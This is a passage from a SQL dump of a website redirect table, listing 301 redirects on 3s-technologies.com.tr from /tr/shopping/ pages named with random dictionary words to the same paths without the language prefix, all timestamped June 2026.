00:00:00',301),(77936,'https://3s-technologies.com.tr/tr/shopping/dolesomeness/3767352725.html',NULL,'https://3s-technologies.com.tr/shopping/dolesomeness/3767352725.html','',1,0,'2026-06-11 10:34:39','0000-00-00 00:00:00',301),(77937,'https://3s-technologies.com.tr/tr/shopping/klaxon/504008924.html',NULL,'https://3s-technologies.com.tr/shopping/klaxon/504008924.html','',1,0,'2026-06-11 10:34:43','0000-00-00 00:00:00',301),(77938,'https://3s-technologies.com.tr/tr/shopping/clostridium/2747372404.html',NULL,'https://3s-technologies.com.tr/shopping/clostridium/2747372404.html','',1,0,'2026-06-11 10:34:46','0000-00-00 00:00:00',301),(77939,'https://3s-technologies.com.tr/tr/shopping/macruridae/1458124437.html',NULL,'https://3s-technologies.com.tr/shopping/macruridae/1458124437.html','',1,0,'2026-06-11 10:34:49','0000-00-00 00:00:00',301),(77940,'https://3s-technologies.com.tr/tr/shopping/hemialbumose/3824759094.html',NULL,'https://3s-technologies.com.tr/shopping/hemialbumose/3824759094.html','',1,0,'2026-06-11 10:34:52','0000-00-00 00:00:00',301),(77941,'https://3s-technologies.com.tr/tr/shopping/photonephograph/1010343113.html',NULL,'https://3s-technologies.com.tr/shopping/photonephograph/1010343113.html','',1,0,'2026-06-11 10:34:55','0000-00-00 00:00:00',301),(77942,'https://3s-technologies.com.tr/tr/shopping/agrostographical/1984654025.html',NULL,'https://3s-technologies.com.tr/shopping/agrostographical/1984654025.html','',1,0,'2026-06-11 10:34:58','0000-00-00 00:00:00',301),(77943,'https://3s-technologies.com.tr/tr/shopping/serumtherapy/2724231691.html',NULL,'https://3s-technologies.com.tr/shopping/serumtherapy/2724231691.html','',1,0,'2026-06-11 10:35:01','0000-00-00 00:00:00',301),(77944,'https://3s-technologies.com.tr/tr/shopping/slambang/3140751493.html',NULL,'https://3s-technologies.com.tr/shopping/slambang/3140751493.html','',1,0,'2026-06-11 10:35:04','0000-00-00 00:00:00',301),(77945,'https://3s-technologies.com.tr/tr/shopping/hydrobranchiata/2952929474.html',NULL,'https://3s-technologies.com.tr/shopping/hydrobranchiata/2952929474.html','',1,0,'2026-06-11 10:35:07','0000-00-00 00:00:00',301),(77946,'https://3s-technologies.com.tr/tr/shopping/unlovely/821651675.html',NULL,'https://3s-technologies.com.tr/shopping/unlovely/821651675.html','',1,0,'2026-06-11 10:35:10','0000-00-00 00:00:00',301),(77947,'https://3s-technologies.com.tr/tr/shopping/vigesimal/1039808806.html',NULL,'https://3s-technologies.com.tr/shopping/vigesimal/1039808806.html','',1,0,'2026-06-11 10:35:13','0000-00-00 00:00:00',301),(77948,'https://3s-technologies.com.tr/tr/shopping/pantacosm/2185694226.html',NULL,'https://3s-technologies.com.tr/shopping/pantacosm/2185694226.html','',1,0,'2026-06-11 10:35:16','0000-00-00 00:00:00',301),(77949,'https://3s-technologies.com.tr/tr/shopping/helictis/273609572.html',NULL,'https://3s-technologies.com.tr/shopping/helictis/273609572.html','',1,0,'2026-06-11 10:35:22','0000-00-00 00:00:00',301),(77950,'https://3s-technologies.com.tr/tr/shopping/neossine/2555197334.html',NULL,'https://3s-technologies.com.tr/shopping/neossine/2555197334.html','',1,0,'2026-06-11 10:35:26','0000-00-00 00:00:00',301),(77951,'https://3s-technologies.com.tr/tr/shopping/pollybait/271444982.html',NULL,'https://3s-technologies.com.tr/shopping/pollybait/271444982.html','',1,0,'2026-06-11 10:35:29','0000-00-00 00:00:00',301),(77952,'https://3s-technologies.com.tr/tr/shopping/disesteemer/1223824351.html',NULL,'https://3s-technologies.com.tr/shopping/disesteemer/1223824351.html','',1,0,'2026-06-11 10:35:32','0000-00-00 00:00:00',301),(77953,'https://3s-technologies.com.tr/tr/shopping/guanos/976208181.html',NULL,'https://3s-technologies.com.tr/shopping/guanos/976208181.html','',1,0,'2026-06-11 10:35:35','0000-00-00 00:00:00',301),(77954,'https://3s-technologies.com.tr/tr/shopping/scandalous/1602767305.html',NULL,'https://3s-technologies.com.tr/shopping/scandalous/1602767305.html','',1,0,'2026-06-11 10:35:38','0000-00-00 00:00:00',301),(77955,'https://3s-technologies.com.tr/tr/shopping/adhesiveness/1184639836.html',NULL,'https://3s-technologies.com.tr/shopping/adhesiveness/1184639836.html','',1,0,'2026-06-11 10:35:41','0000-00-00 00:00:00',301),(77956,'https://3s-technologies.com.tr/tr/shopping/beneficial/1106747461.html',NULL,'https://3s-technologies.com.tr/shopping/beneficial/1106747461.html','',1,0,'2026-06-11 10:35:44','0000-00-00 00:00:00',301),(77957,'https://3s-technologies.com.tr/tr/shopping/swanlike/3103239437.html',NULL,'https://3s-technologies.com.tr/shopping/swanlike/3103239437.html','',1,0,'2026-06-11 10:35:47','0000-00-00 00:00:00',301),(77958,'https://3s-technologies.com.tr/tr/shopping/organizational/568979236.html',NULL,'https://3s-technologies.com.tr/shopping/organizational/568979236.html','',1,0,'2026-06-11 10:35:50','0000-00-00 00:00:00',301),(77959,'https://3s-technologies.com.tr/tr/shopping/remedilessly/1031977137.html',NULL,'https://3s-technologies.com.tr/shopping/remedilessly/1031977137.html','',1,0,'2026-06-11 10:35:53','0000-00-00 00:00:00',301),(77960,'https://3s-technologies.com.tr/tr/shopping/parabolist/2188118408.html',NULL,'https://3s-technologies.com.tr/shopping/parabolist/2188118408.html','',1,0,'2026-06-11 10:35:56','0000-00-00 00:00:00',301),(77961,'https://3s-technologies.com.tr/tr/shopping/heliotropium/4158224515.html',NULL,'https://3s-technologies.com.tr/shopping/heliotropium/4158224515.html','',1,0,'2026-06-11 10:35:59','0000-00-00 00:00:00',301),(77962,'https://3s-technologies.com.tr/tr/shopping/healthily/3544694591.html',NULL,'https://3s-technologies.com.tr/shopping/healthily/3544694591.html','',1,0,'2026-06-11 10:36:03','0000-00-00 00:00:00',301),(77963,'https://3s-technologies.com.tr/tr/shopping/exauctorate/4260207026.html',NULL,'https://3s-technologies.com.tr/shopping/exauctorate/4260207026.html','',1,0,'2026-06-11 10:36:05','0000-00-00 00:00:00',301),(77964,'https://3s-technologies.com.tr/tr/shopping/gurglingly/1359650181.html',NULL,'https://3s-technologies.com.tr/shopping/gurglingly/1359650181.html','',1,0,'2026-06-11 10:36:09','0000-00-00 00:00:00',301),(77965,'https://3s-technologies.com.tr/tr/shopping/potamogale/2401161922.html',NULL,'https://3s-technologies.com.tr/shopping/potamogale/2401161922.html','',1,0,'2026-06-11 10:36:12','0000-00-00 00:00:00',301),(77966,'https://3s-technologies.com.tr/tr/shopping/overraked/1011983626.html',NULL,'https://3s-technologies.com.tr/shopping/overraked/1011983626.html','',1,0,'2026-06-11 10:36:14','0000-00-00 00:00:00',301),(77967,'https://3s-technologies.com.tr/tr/shopping/church/1008081654.html',NULL,'https://3s-technologies.com.tr/shopping/church/1008081654.html','',1,0,'2026-06-11 10:36:17','0000-00-00 00:00:00',301),(77968,'https://3s-technologies.com.tr/tr/shopping/cracknel/1559582855.html',NULL,'https://3s-technologies.com.tr/shopping/cracknel/1559582855.html','',1,0,'2026-06-11 10:36:21','0000-00-00 00:00:00',301),(77969,'https://3s-technologies.com.tr/tr/shopping/cosupreme/1944123356.html',NULL,'https://3s-technologies.com.tr/shopping/cosupreme/1944123356.html','',1,0,'2026-06-11 10:36:23','0000-00-00 00:00:00',301),(77970,'https://3s-technologies.com.tr/tr/shopping/paddies/3622111264.html',NULL,'https://3s-technologies.com.tr/shopping/paddies/3622111264.html','',1,0,'2026-06-11 10:36:27','0000-00-00 00:00:00',301),(77971,'https://3s-technologies.com.tr/tr/shopping/scutage/2028145831.html',NULL,'https://3s-technologies.com.tr/shopping/scutage/2028145831.html','',1,0,'2026-06-11 10:36:30','0000-00-00 00:00:00',301),(77972,'https://3s-technologies.com.tr/tr/shopping/debonairly/1081870572.html',NULL,'https://3s-technologies.com.tr/shopping/debonairly/1081870572.html','',1,0,'2026-06-11 10:36:33','0000-00-00 00:00:00',301),(77973,'https://3s-technologies.com.tr/tr/shopping/otherguess/2452262364.html',NULL,'https://3s-technologies.com.tr/shopping/otherguess/2452262364.html','',1,0,'2026-06-11 10:36:36','0000-00-00 00:00:00',301),(77974,'https://3s-technologies.com.tr/tr/shopping/plagiotropic/1835616909.html',NULL,'https://3s-technologies.com.tr/shopping/plagiotropic/1835616909.html','',1,0,'2026-06-11 10:36:38','0000-00-00 00:00:00',301),(77975,'https://3s-technologies.com.tr/tr/shopping/resolvedly/166344868.html',NULL,'https://3s-technologies.com.tr/shopping/resolvedly/166344868.html','',1,0,'2026-06-11 10:36:42','0000-00-00 00:00:00',301),(77976,'https://3s-technologies.com.tr/tr/shopping/shipwreck/4145953089.html',NULL,'https://3s-technologies.com.tr/shopping/shipwreck/4145953089.html','',1,0,'2026-06-11 10:36:45','0000-00-00 00:00:00',301),(77977,'https://3s-technologies.com.tr/tr/shopping/ushership/2815532564.html',NULL,'https://3s-technologies.com.tr/shopping/ushership/2815532564.html','',1,0,'2026-06-11 10:36:48','0000-00-00 00:00:00',301),(77978,'https://3s-technologies.com.tr/tr/shopping/commanding/2260343295.html',NULL,'https://3s-technologies.com.tr/shopping/commanding/2260343295.html','',1,0,'2026-06-11 10:36:52','0000-00-00 00:00:00',301),(77979,'https://3s-technologies.com.tr/tr/shopping/angularly/3206618554.html',NULL,'https://3s-technologies.com.tr/shopping/angularly/3206618554.html','',1,0,'2026-06-11 10:36:55','0000-00-00 00:00:00',301),(77980,'https://3s-technologies.com.tr/tr/shopping/fleuron/930831695.html',NULL,'https://3s-technologies.com.tr/shopping/fleuron/930831695.html','',1,0,'2026-06-11 10:36:58','0000-00-00 00:00:00',301),(77981,'https://3s-technologies.com.tr/tr/shopping/nuttalli/2024605619.html',NULL,'https://3s-technologies.com.tr/shopping/nuttalli/2024605619.html','',1,0,'2026-06-11 10:37:02','0000-00-00 00:00:00',301),(77982,'https://3s-technologies.com.tr/tr/shopping/albescent/3627077775.html',NULL,'https://3s-technologies.com.tr/shopping/albescent/3627077775.html','',1,0,'2026-06-11 10:37:04','0000-00-00 00:00:00',301),(77983,'https://3s-technologies.com.tr/tr/shopping/birthwort/4118416770.html',NULL,'https://3s-technologies.com.tr/shopping/birthwort/4118416770.html','',1,0,'2026-06-11 10:37:07','0000-00-00 00:00:00',301),(77984,'https://3s-technologies.com.tr/tr/shopping/relegated/2307277222.html',NULL,'https://3s-technologies.com.tr/shopping/relegated/2307277222.html','',1,0,'2026-06-11 10:37:10','0000-00-00 00:00:00',301),(77985,'https://3s-technologies.com.tr/tr/shopping/thuya/854706042.html',NULL,'https://3s-technologies.com.tr/shopping/thuya/854706042.html','',1,0,'2026-06-11 10:37:13','0000-00-00 00:00:00',301),(77986,'https://3s-technologies.com.tr/tr/shopping/motleyminded/740235201.html',NULL,'https://3s-technologies.com.tr/shopping/motleyminded/740235201.html','',1,0,'2026-06-11 10:37:16','0000-00-00 00:00:00',301),(77987,'https://3s-technologies.com.tr/tr/shopping/filibeg/316005070.html',NULL,'https://3s-technologies.com.tr/shopping/filibeg/316005070.html','',1,0,'2026-06-11 10:37:19','0000-00-00 00:00:00',301),(77988,'https://3s-technologies.com.tr/tr/shopping/jovialist/3969449989.html',NULL,'https://3s-technologies.com.tr/shopping/jovialist/3969449989.html','',1,0,'2026-06-11 10:37:22','0000-00-00 00:00:00',301),(77989,'https://3s-technologies.com.tr/tr/shopping/circumgyration/1458287176.html',NULL,'https://3s-technologies.com.tr/shopping/circumgyration/1458287176.html','',1,0,'2026-06-11 10:37:26','0000-00-00 00:00:00',301),(77990,'https://3s-technologies.com.tr/tr/shopping/anostraca/813522659.html',NULL,'https://3s-technologies.com.tr/shopping/anostraca/813522659.html','',1,0,'2026-06-11 10:37:28','0000-00-00 00:00:00',301),(77991,'https://3s-technologies.com.tr/tr/shopping/masturbate/3820301421.html',NULL,'https://3s-technologies.com.tr/shopping/masturbate/3820301421.html','',1,0,'2026-06-11 10:37:31','0000-00-00 00:00:00',301),(77992,'https://3s-technologies.com.tr/tr/shopping/assertable/3124442251.html',NULL,'https://3s-technologies.com.tr/shopping/assertable/3124442251.html','',1,0,'2026-06-11 10:37:39','0000-00-00 00:00:00',301),(77993,'https://3s-technologies.com.tr/tr/shopping/inserting/217939480.html',NULL,'https://3s-technologies.com.tr/shopping/inserting/217939480.html','',1,0,'2026-06-11 10:37:42','0000-00-00 00:00:00',301),(77994,'https://3s-technologies.com.tr/tr/shopping/patterning/4029673795.html',NULL,'https://3s-technologies.com.tr/shopping/patterning/4029673795.html','',1,0,'2026-06-11 10:37:46','0000-00-00 00:00:00',301),(77995,'https://3s-technologies.com.tr/tr/shopping/outwarddeveloping/4152869974.html',NULL,'https://3s-technologies.com.tr/shopping/outwarddeveloping/4152869974.html','',1,0,'2026-06-11 10:37:49','0000-00-00 00:00:00',301),(77996,'https://3s-technologies.com.tr/tr/shopping/pulldevil/1218306287.html',NULL,'https://3s-technologies.com.tr/shopping/pulldevil/1218306287.html','',1,0,'2026-06-11 10:37:52','0000-00-00 00:00:00',301),(77997,'https://3s-technologies.com.tr/tr/shopping/execrable/582355387.html',NULL,'https://3s-technologies.com.tr/shopping/execrable/582355387.html','',1,0,'2026-06-11 10:38:07','0000-00-00 00:00:00',301),(77998,'https://3s-technologies.com.tr/tr/shopping/complexly/22759133.html',NULL,'https://3s-technologies.com.tr/shopping/complexly/22759133.html','',1,0,'2026-06-11 10:38:10','0000-00-00 00:00:00',301),(77999,'https://3s-technologies.com.tr/tr/shopping/oiler/2201831766.html',NULL,'https://3s-technologies.com.tr/shopping/oiler/2201831766.html','',1,0,'2026-06-11 10:38:55','0000-00-00 00:00:00',301),(78000,'https://3s-technologies.com.tr/tr/shopping/angularity/3064664775.html',NULL,'https://3s-technologies.com.tr/shopping/angularity/3064664775.html','',1,0,'2026-06-11 10:38:57','0000-00-00 00:00:00',301),(78001,'https://3s-technologies.com.tr/tr/shopping/overloop/1541488988.html',NULL,'https://3s-technologies.com.tr/shopping/overloop/1541488988.html','',1,0,'2026-06-11 10:39:12','0000-00-00 00:00:00',301),(78002,'https://3s-technologies.com.tr/tr/shopping/thuringite/1925258801.html',NULL,'https://3s-technologies.com.tr/shopping/thuringite/1925258801.html','',1,0,'2026-06-11 10:39:16','0000-00-00 00:00:00',301),(78003,'https://3s-technologies.com.tr/tr/shopping/legate/603063377.html',NULL,'https://3s-technologies.com.tr/shopping/legate/603063377.html','',1,0,'2026-06-11 10:39:40','0000-00-00 00:00:00',301),(78004,'https://3s-technologies.com.tr/tr/shopping/dodder/1582950259.html',NULL,'https://3s-technologies.com.tr/shopping/dodder/1582950259.html','',1,0,'2026-06-11 10:39:42','0000-00-00 00:00:00',301),(78005,'https://3s-technologies.com.tr/tr/shopping/exceptor/970666380.html',NULL,'https://3s-technologies.com.tr/shopping/exceptor/970666380.html','',1,0,'2026-06-11 10:39:59','0000-00-00 00:00:00',301),(78006,'https://3s-technologies.com.tr/tr/shopping/jackboot/1752838344.html',NULL,'https://3s-technologies.com.tr/shopping/jackboot/1752838344.html','',1,0,'2026-06-11 10:40:02','0000-00-00 00:00:00',301),(78007,'https://3s-technologies.com.tr/tr/shopping/matchmaker/354512245.html',NULL,'https://3s-technologies.com.tr/shopping/matchmaker/354512245.html','',1,0,'2026-06-11 10:40:17','0000-00-00 00:00:00',301),(78008,'https://3s-technologies.com.tr/tr/shopping/bombshell/1933483886.html',NULL,'https://3s-technologies.com.tr/shopping/bombshell/1933483886.html','',1,0,'2026-06-11 10:40:20','0000-00-00 00:00:00',301),(78009,'https://3s-technologies.com.tr/tr/shopping/selfabhorrence/2858398596.html',NULL,'https://3s-technologies.com.tr/shopping/selfabhorrence/2858398596.html','',1,0,'2026-06-11 10:40:41','0000-00-00 00:00:00',301),(78010,'https://3s-technologies.com.tr/tr/shopping/button/1589867160.html',NULL,'https://3s-technologies.com.tr/shopping/button/1589867160.html','',1,0,'2026-06-11 10:40:43','0000-00-00 00:00:00',301),(78011,'https://3s-technologies.com.tr/tr/shopping/catopter/2881110927.html',NULL,'https://3s-technologies.com.tr/shopping/catopter/2881110927.html','',1,0,'2026-06-11 10:41:00','0000-00-00 00:00:00',301),(78012,'https://3s-technologies.com.tr/tr/shopping/viewing/985760743.html',NULL,'https://3s-technologies.com.tr/shopping/viewing/985760743.html','',1,0,'2026-06-11 10:41:02','0000-00-00 00:00:00',301),(78013,'https://3s-technologies.com.tr/tr/shopping/interrogative/3583563526.html',NULL,'https://3s-technologies.com.tr/shopping/interrogative/3583563526.html','',1,0,'2026-06-11 10:41:20','0000-00-00 00:00:00',301),(78014,'https://3s-technologies.com.tr/tr/shopping/overnight/824123797.html',NULL,'https://3s-technologies.com.tr/shopping/overnight/824123797.html','',1,0,'2026-06-11 10:41:24','0000-00-00 00:00:00',301),(78015,'https://3s-technologies.com.tr/tr/shopping/dicky/2738108572.html',NULL,'https://3s-technologies.com.tr/shopping/dicky/2738108572.html','',1,0,'2026-06-11 10:41:49','0000-00-00 00:00:00',301),(78016,'https://3s-technologies.com.tr/tr/shopping/objected/1297386992.html',NULL,'https://3s-technologies.com.tr/shopping/objected/1297386992.html','',1,0,'2026-06-11 10:41:51','0000-00-00 00:00:00',301),(78017,'https://3s-technologies.com.tr/tr/shopping/deifier/199235744.html',NULL,'https://3s-technologies.com.tr/shopping/deifier/199235744.html','',1,0,'2026-06-11 10:41:59','0000-00-00 00:00:00',301),(78018,'https://3s-technologies.com.tr/tr/shopping/randomly/3789882699.html',NULL,'https://3s-technologies.com.tr/shopping/randomly/3789882699.html','',1,0,'2026-06-11 10:42:01','0000-00-00 00:00:00',301),(78019,'https://3s-technologies.com.tr/tr/shopping/onefifth/4072069293.html',NULL,'https://3s-technologies.com.tr/shopping/onefifth/4072069293.html','',1,0,'2026-06-11 10:42:05','0000-00-00 00:00:00',301),(78020,'https://3s-technologies.com.tr/tr/shopping/centesimation/111788070.html',NULL,'https://3s-technologies.com.tr/shopping/centesimation/111788070.html','',1,0,'2026-06-11 10:42:07','0000-00-00 00:00:00',301),(78021,'https://3s-technologies.com.tr/tr/shopping/prorector/65574472.html',NULL,'https://3s-technologies.com.tr/shopping/prorector/65574472.html','',1,0,'2026-06-11 10:42:31','0000-00-00 00:00:00',301),(78022,'https://3s-technologies.com.tr/tr/shopping/despecification/161756096.html',NULL,'https://3s-technologies.com.tr/shopping/despecification/161756096.html','',1,0,'2026-06-11 10:42:34','0000-00-00 00:00:00',301),(78023,'https://3s-technologies.com.tr/tr/shopping/originatively/2962709204.html',NULL,'https://3s-technologies.com.tr/shopping/originatively/2962709204.html','',1,0,'2026-06-11 10:42:48','0000-00-00 00:00:00',301),(78024,'https://3s-technologies.com.tr/tr/shopping/selfdevotement/674204557.html',NULL,'https://3s-technologies.com.tr/shopping/selfdevotement/674204557.html','',1,0,'2026-06-11 10:42:50','0000-00-00 00:00:00',301),(78025,'https://3s-technologies.com.tr/tr/shopping/contextured/2842255641.html',NULL,'https://3s-technologies.com.tr/shopping/contextured/2842255641.html','',1,0,'2026-06-11 10:43:00','0000-00-00 00:00:00',301),(78026,'https://3s-technologies.com.tr/tr/shopping/excerption/2646489698.html',NULL,'https://3s-technologies.com.tr/shopping/excerption/2646489698.html','',1,0,'2026-06-11 10:43:02','0000-00-00 00:00:00',301),(78027,'https://3s-technologies.com.tr/tr/shopping/assemblies/3440561171.html',NULL,'https://3s-technologies.com.tr/shopping/assemblies/3440561171.html','',1,0,'2026-06-11 10:43:11','0000-00-00 00:00:00',301),(78028,'https://3s-technologies.com.tr/tr/shopping/worthwhile/3461456437.html',NULL,'https://3s-technologies.com.tr/shopping/worthwhile/3461456437.html','',1,0,'2026-06-11 10:43:12','0000-00-00 00:00:00',301),(78029,'https://3s-technologies.com.tr/tr/shopping/plainhearted/1544095005.html',NULL,'https://3s-technologies.com.tr/shopping/plainhearted/1544095005.html','',1,0,'2026-06-11 10:43:33','0000-00-00 00:00:00',301),(78030,'https://3s-technologies.com.tr/tr/shopping/changed/1819340075.html',NULL,'https://3s-technologies.com.tr/shopping/changed/1819340075.html','',1,0,'2026-06-11 10:43:35','0000-00-00 00:00:00',301),(78031,'https://3s-technologies.com.tr/tr/shopping/viewer/40697583.html',NULL,'https://3s-technologies.com.tr/shopping/viewer/40697583.html','',1,0,'2026-06-11 10:44:04','0000-00-00 00:00:00',301),(78032,'https://3s-technologies.com.tr/tr/shopping/fivefold/1236849671.html',NULL,'https://3s-technologies.com.tr/shopping/fivefold/1236849671.html','',1,0,'2026-06-11 10:44:07','0000-00-00 00:00:00',301),(78033,'https://3s-technologies.com.tr/tr/shopping/firth/319689307.html',NULL,'https://3s-technologies.com.tr/shopping/firth/319689307.html','',1,0,'2026-06-11 10:44:20','0000-00-00 00:00:00',301),(78034,'https://3s-technologies.com.tr/tr/shopping/prepositional/1319494341.html',NULL,'https://3s-technologies.com.tr/shopping/prepositional/1319494341.html','',1,0,'2026-06-11 10:44:22','0000-00-00 00:00:00',301),(78035,'https://3s-technologies.com.tr/tr/shopping/combining/1268528448.html',NULL,'https://3s-technologies.com.tr/shopping/combining/1268528448.html','',1,0,'2026-06-11 10:44:39','0000-00-00 00:00:00',301),(78036,'https://3s-technologies.com.tr/tr/shopping/tyrant/3560062243.html',NULL,'https://3s-technologies.com.tr/shopping/tyrant/3560062243.html','',1,0,'2026-06-11 10:44:41','0000-00-00 00:00:00',301),(78037,'https://3s-technologies.com.tr/tr/shopping/pumpet/248989554.html',NULL,'https://3s-technologies.com.tr/shopping/pumpet/248989554.html','',1,0,'2026-06-11 10:45:07','0000-00-00 00:00:00',301),(78038,'https://3s-technologies.com.tr/tr/shopping/substantialized/1706851973.html',NULL,'https://3s-technologies.com.tr/shopping/substantialized/1706851973.html','',1,0,'2026-06-11 10:45:09','0000-00-00 00:00:00',301),(78039,'https://3s-technologies.com.tr/tr/shopping/recognizable/2182455475.html',NULL,'https://3s-technologies.com.tr/shopping/recognizable/2182455475.html','',1,0,'2026-06-11 10:45:15','0000-00-00 00:00:00',301),(78040,'https://3s-technologies.com.tr/tr/shopping/phonogram/2631702179.html',NULL,'https://3s-technologies.com.tr/shopping/phonogram/2631702179.html','',1,0,'2026-06-11 10:45:17','0000-00-00 00:00:00',301),(78041,'https://3s-technologies.com.tr/tr/shopping/serotine/585947761.html',NULL,'https://3s-technologies.com.tr/shopping/serotine/585947761.html','',1,0,'2026-06-11 10:45:20','0000-00-00 00:00:00',301),(78042,'https://3s-technologies.com.tr/tr/shopping/interworking/4077406384.html',NULL,'https://3s-technologies.com.tr/shopping/interworking/4077406384.html','',1,0,'2026-06-11 10:45:23','0000-00-00 00:00:00',301),(78043,'https://3s-technologies.com.tr/tr/shopping/sylvatica/4253640386.html',NULL,'https://3s-technologies.com.tr/shopping/sylvatica/4253640386.html','',1,0,'2026-06-11 10:45:26','0000-00-00 00:00:00',301),(78044,'https://3s-technologies.com.tr/tr/shopping/bepowder/3989188038.html',NULL,'https://3s-technologies.com.tr/shopping/bepowder/3989188038.html','',1,0,'2026-06-11 10:45:29','0000-00-00 00:00:00',301),(78045,'https://3s-technologies.com.tr/tr/shopping/pacification/2867535507.html',NULL,'https://3s-technologies.com.tr/shopping/pacification/2867535507.html','',1,0,'2026-06-11 10:45:45','0000-00-00 00:00:00',301),(78046,'https://3s-technologies.com.tr/tr/shopping/shrilly/586944175.html',NULL,'https://3s-technologies.com.tr/shopping/shrilly/586944175.html','',1,0,'2026-06-11 10:45:47','0000-00-00 00:00:00',301),(78047,'https://3s-technologies.com.tr/tr/shopping/chariness/4286516618.html',NULL,'https://3s-technologies.com.tr/shopping/chariness/4286516618.html','',1,0,'2026-06-11 10:45:50','0000-00-00 00:00:00',301),(78048,'https://3s-technologies.com.tr/tr/shopping/quiddative/2152003441.html',NULL,'https://3s-technologies.com.tr/shopping/quiddative/2152003441.html','',1,0,'2026-06-11 10:45:53','0000-00-00 00:00:00',301),(78049,'https://3s-technologies.com.tr/tr/shopping/blared/3233277111.html',NULL,'https://3s-technologies.com.tr/shopping/blared/3233277111.html','',1,0,'2026-06-11 10:45:56','0000-00-00 00:00:00',301),(78050,'https://3s-technologies.com.tr/tr/shopping/nousel/2305558994.html',NULL,'https://3s-technologies.com.tr/shopping/nousel/2305558994.html','',1,0,'2026-06-11 10:45:59','0000-00-00 00:00:00',301),(78051,'https://3s-technologies.com.tr/tr/shopping/stylographically/48406694.html',NULL,'https://3s-technologies.com.tr/shopping/stylographically/48406694.html','',1,0,'2026-06-11 10:46:02','0000-00-00 00:00:00',301),(78052,'https://3s-technologies.com.tr/tr/shopping/commiserable/1948551341.html',NULL,'https://3s-technologies.com.tr/shopping/commiserable/1948551341.html','',1,0,'2026-06-11 10:46:10','0000-00-00 00:00:00',301),(78053,'https://3s-technologies.com.tr/tr/shopping/modeled/4084582893.html',NULL,'https://3s-technologies.com.tr/shopping/modeled/4084582893.html','',1,0,'2026-06-11 10:46:13','0000-00-00 00:00:00',301),(78054,'https://3s-technologies.com.tr/tr/shopping/disusage/3702206982.html',NULL,'https://3s-technologies.com.tr/shopping/disusage/3702206982.html','',1,0,'2026-06-11 10:46:16','0000-00-00 00:00:00',301),(78055,'https://3s-technologies.com.tr/tr/shopping/hooklet/143212680.html',NULL,'https://3s-technologies.com.tr/shopping/hooklet/143212680.html','',1,0,'2026-06-11 10:46:19','0000-00-00 00:00:00',301),(78056,'https://3s-technologies.com.tr/tr/shopping/electrotyping/170288041.html',NULL,'https://3s-technologies.com.tr/shopping/electrotyping/170288041.html','',1,0,'2026-06-11 10:46:22','0000-00-00 00:00:00',301),(78057,'https://3s-technologies.com.tr/tr/shopping/jackoftheclock/1489752391.html',NULL,'https://3s-technologies.com.tr/shopping/jackoftheclock/1489752391.html','',1,0,'2026-06-11 10:46:25','0000-00-00 00:00:00',301),(78058,'https://3s-technologies.com.tr/tr/shopping/reading/953498586.html',NULL,'https://3s-technologies.com.tr/shopping/reading/953498586.html','',1,0,'2026-06-11 10:46:28','0000-00-00 00:00:00',301),(78059,'https://3s-technologies.com.tr/tr/shopping/invigorating/793231821.html',NULL,'https://3s-technologies.com.tr/shopping/invigorating/793231821.html','',1,0,'2026-06-11 10:46:31','0000-00-00 00:00:00',301),(78060,'https://3s-technologies.com.tr/tr/shopping/endurable/1296529376.html',NULL,'https://3s-technologies.com.tr/shopping/endurable/1296529376.html','',1,0,'2026-06-11 10:46:34','0000-00-00 00:00:00',301),(78061,'https://3s-technologies.com.tr/tr/shopping/improvisatory/630546299.html',NULL,'https://3s-technologies.com.tr/shopping/improvisatory/630546299.html','',1,0,'2026-06-11 10:46:37','0000-00-00 00:00:00',301),(78062,'https://3s-technologies.com.tr/tr/shopping/predictive/2207332396.html',NULL,'https://3s-technologies.com.tr/shopping/predictive/2207332396.html','',1,0,'2026-06-11 10:46:40','0000-00-00 00:00:00',301),(78063,'https://3s-technologies.com.tr/tr/shopping/raninus/79525913.html',NULL,'https://3s-technologies.com.tr/shopping/raninus/79525913.html','',1,0,'2026-06-11 10:46:43','0000-00-00 00:00:00',301),(78064,'https://3s-technologies.com.tr/tr/shopping/lettered/1651484552.html',NULL,'https://3s-technologies.com.tr/shopping/lettered/1651484552.html','',1,0,'2026-06-11 10:46:46','0000-00-00 00:00:00',301),(78065,'https://3s-technologies.com.tr/tr/shopping/duplexa/3524027190.html',NULL,'https://3s-technologies.com.tr/shopping/duplexa/3524027190.html','',1,0,'2026-06-11 10:46:49','0000-00-00 00:00:00',301),(78066,'https://3s-technologies.com.tr/tr/shopping/individually/2230106930.html',NULL,'https://3s-technologies.com.tr/shopping/individually/2230106930.html','',1,0,'2026-06-11 10:46:52','0000-00-00 00:00:00',301),(78067,'https://3s-technologies.com.tr/tr/shopping/postboy/423999915.html',NULL,'https://3s-technologies.com.tr/shopping/postboy/423999915.html','',1,0,'2026-06-11 10:46:55','0000-00-00 00:00:00',301),(78068,'https://3s-technologies.com.tr/tr/shopping/ephialtes/3683083373.html',NULL,'https://3s-technologies.com.tr/shopping/ephialtes/3683083373.html','',1,0,'2026-06-11 10:46:58','0000-00-00 00:00:00',301),(78069,'https://3s-technologies.com.tr/tr/shopping/bemiring/2469620122.html',NULL,'https://3s-technologies.com.tr/shopping/bemiring/2469620122.html','',1,0,'2026-06-11 10:47:01','0000-00-00 00:00:00',301),(78070,'https://3s-technologies.com.tr/tr/shopping/onerating/4188729962.html',NULL,'https://3s-technologies.com.tr/shopping/onerating/4188729962.html','',1,0,'2026-06-11 10:47:04','0000-00-00 00:00:00',301),(78071,'https://3s-technologies.com.tr/tr/shopping/touchingly/1312716254.html',NULL,'https://3s-technologies.com.tr/shopping/touchingly/1312716254.html','',1,0,'2026-06-11 10:47:09','0000-00-00 00:00:00',301),(78072,'https://3s-technologies.com.tr/tr/shopping/malayan/1054877632.html',NULL,'https://3s-technologies.com.tr/shopping/malayan/1054877632.html','',1,0,'2026-06-11 10:47:11','0000-00-00 00:00:00',301),(78073,'https://3s-technologies.com.tr/tr/shopping/dazed/1959754693.html',NULL,'https://3s-technologies.com.tr/shopping/dazed/1959754693.html','',1,0,'2026-06-11 10:47:14','0000-00-00 00:00:00',301),(78074,'https://3s-technologies.com.tr/tr/shopping/whelping/732274627.html',NULL,'https://3s-technologies.com.tr/shopping/whelping/732274627.html','',1,0,'2026-06-11 10:47:17','0000-00-00 00:00:00',301),(78075,'https://3s-technologies.com.tr/tr/shopping/bivious/95061719.html',NULL,'https://3s-technologies.com.tr/shopping/bivious/95061719.html','',1,0,'2026-06-11 10:47:20','0000-00-00 00:00:00',301),(78076,'https://3s-technologies.com.tr/tr/shopping/obeisancy/44866498.html',NULL,'https://3s-technologies.com.tr/shopping/obeisancy/44866498.html','',1,0,'2026-06-11 10:47:23','0000-00-00 